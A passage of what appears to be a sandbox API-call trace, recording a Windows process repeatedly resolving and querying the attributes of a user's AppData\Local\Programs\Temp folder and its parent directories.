[0077.088] GetLastError () returned 0xcb [0077.088] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.088] GetLastError () returned 0xcb [0077.088] SetErrorMode (uMode=0x1) returned 0x1 [0077.088] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.088] GetLastError () returned 0xcb [0077.089] SetErrorMode (uMode=0x1) returned 0x1 [0077.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.089] GetLastError () returned 0xcb [0077.089] SetErrorMode (uMode=0x1) returned 0x1 [0077.089] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.089] GetLastError () returned 0xcb [0077.089] SetErrorMode (uMode=0x1) returned 0x1 [0077.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0xade64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.089] GetLastError () returned 0xcb [0077.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.", nBufferLength=0x105, lpBuffer=0xade00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.089] GetLastError () returned 0xcb [0077.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.089] GetLastError () returned 0xcb [0077.089] SetErrorMode (uMode=0x1) returned 0x1 [0077.089] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.089] GetLastError () returned 0xcb [0077.089] SetErrorMode (uMode=0x1) returned 0x1 [0077.089] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.089] GetLastError () returned 0xcb [0077.089] SetErrorMode (uMode=0x1) returned 0x1 [0077.089] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.090] GetLastError () returned 0xcb [0077.090] SetErrorMode (uMode=0x1) returned 0x1 [0077.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xade64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.090] GetLastError () returned 0xcb [0077.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\.", nBufferLength=0x105, lpBuffer=0xade00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.090] GetLastError () returned 0xcb [0077.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.090] GetLastError () returned 0xcb [0077.090] SetErrorMode (uMode=0x1) returned 0x1 [0077.090] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.090] GetLastError () returned 0xcb [0077.090] SetErrorMode (uMode=0x1) returned 0x1 [0077.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.090] GetLastError () returned 0xcb [0077.090] SetErrorMode (uMode=0x1) returned 0x1 [0077.090] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.090] GetLastError () returned 0xcb [0077.090] SetErrorMode (uMode=0x1) returned 0x1 [0077.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", nBufferLength=0x105, lpBuffer=0xade64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.090] GetLastError () returned 0xcb [0077.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\.", nBufferLength=0x105, lpBuffer=0xade00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.090] GetLastError () returned 0xcb [0077.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.091] GetLastError () returned 0xcb [0077.091] SetErrorMode (uMode=0x1) returned 0x1 [0077.091] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.091] GetLastError () returned 0xcb [0077.091] SetErrorMode (uMode=0x1) returned 0x1 [0077.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xade50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.091] GetLastError () returned 0xcb [0077.091] SetErrorMode (uMode=0x1) returned 0x1 [0077.091] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), fInfoLevelId=0x0, lpFileInformation=0xae2d0 | out: lpFileInformation=0xae2d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.091] GetLastError () returned 0xcb [0077.091] SetErrorMode (uMode=0x1) returned 0x1 [0077.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xade64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.091] GetLastError () returned 0xcb [0077.091] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\.", nBufferLength=0x105, lpBuffer=0xade00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.091] GetLastError () returned 0xcb [0077.092] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.092] GetLastError () returned 0xcb [0077.092] SetErrorMode (uMode=0x1) returned 0x1 [0077.092] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.092] GetLastError () returned 0xcb [0077.092] SetErrorMode (uMode=0x1) returned 0x1 [0077.092] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.092] GetLastError () returned 0xcb [0077.092] SetErrorMode (uMode=0x1) returned 0x1 [0077.092] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.092] GetLastError () returned 0xcb [0077.092] SetErrorMode (uMode=0x1) returned 0x1 [0077.092] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xade70, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.092] GetLastError () returned 0xcb [0077.092] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xade0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0077.092] GetLastError () returned 0xcb [0077.092] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0077.092] GetLastError () returned 0xcb [0077.092] SetErrorMode (uMode=0x1) returned 0x1 [0077.092] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0077.093] GetLastError () returned 0xcb [0077.093] SetErrorMode (uMode=0x1) returned 0x1 [0077.093] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0077.093] GetLastError () returned 0xcb [0077.093] SetErrorMode (uMode=0x1) returned 0x1 [0077.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0077.093] GetLastError () returned 0xcb [0077.093] SetErrorMode (uMode=0x1) returned 0x1 [0077.093] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xade70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0077.093] GetLastError () returned 0xcb [0077.093] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0xade0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0077.093] GetLastError () returned 0xcb [0077.093] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.093] GetLastError () returned 0xcb [0077.093] SetErrorMode (uMode=0x1) returned 0x1 [0077.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.093] GetLastError () returned 0xcb [0077.093] SetErrorMode (uMode=0x1) returned 0x1 [0077.093] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.093] GetLastError () returned 0xcb [0077.093] SetErrorMode (uMode=0x1) returned 0x1 [0077.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.094] GetLastError () returned 0xcb [0077.094] SetErrorMode (uMode=0x1) returned 0x1 [0077.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0xade70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.094] GetLastError () returned 0xcb [0077.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.", nBufferLength=0x105, lpBuffer=0xade0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0077.094] GetLastError () returned 0xcb [0077.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.094] GetLastError () returned 0xcb [0077.094] SetErrorMode (uMode=0x1) returned 0x1 [0077.094] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.094] GetLastError () returned 0xcb [0077.094] SetErrorMode (uMode=0x1) returned 0x1 [0077.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.094] GetLastError () returned 0xcb [0077.094] SetErrorMode (uMode=0x1) returned 0x1 [0077.094] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0077.094] GetLastError () returned 0xcb [0077.094] SetErrorMode (uMode=0x1) returned 0x1 [0077.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xade70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.094] GetLastError () returned 0xcb [0077.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\.", nBufferLength=0x105, lpBuffer=0xade0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0077.095] GetLastError () returned 0xcb [0077.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.095] GetLastError () returned 0xcb [0077.095] SetErrorMode (uMode=0x1) returned 0x1 [0077.095] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.095] GetLastError () returned 0xcb [0077.095] SetErrorMode (uMode=0x1) returned 0x1 [0077.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.095] GetLastError () returned 0xcb [0077.095] SetErrorMode (uMode=0x1) returned 0x1 [0077.095] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.095] GetLastError () returned 0xcb [0077.095] SetErrorMode (uMode=0x1) returned 0x1 [0077.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", nBufferLength=0x105, lpBuffer=0xade70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.095] GetLastError () returned 0xcb [0077.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\.", nBufferLength=0x105, lpBuffer=0xade0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFilePart=0x0) returned 0x34 [0077.095] GetLastError () returned 0xcb [0077.095] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.095] GetLastError () returned 0xcb [0077.095] SetErrorMode (uMode=0x1) returned 0x1 [0077.095] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: lpFileInformation=0xae2dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0077.095] GetLastError () returned 0xcb [0077.095] SetErrorMode (uMode=0x1) returned 0x1 [0077.096] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x105, lpBuffer=0xade5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x0) returned 0x39 [0077.096] GetLastError () returned 0xcb [0077.096] SetErrorMode (uMode=0x1) returned 0x1 [0077.096] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), fInfoLevelId=0x0, lpFileInformation=0xae2dc | out: 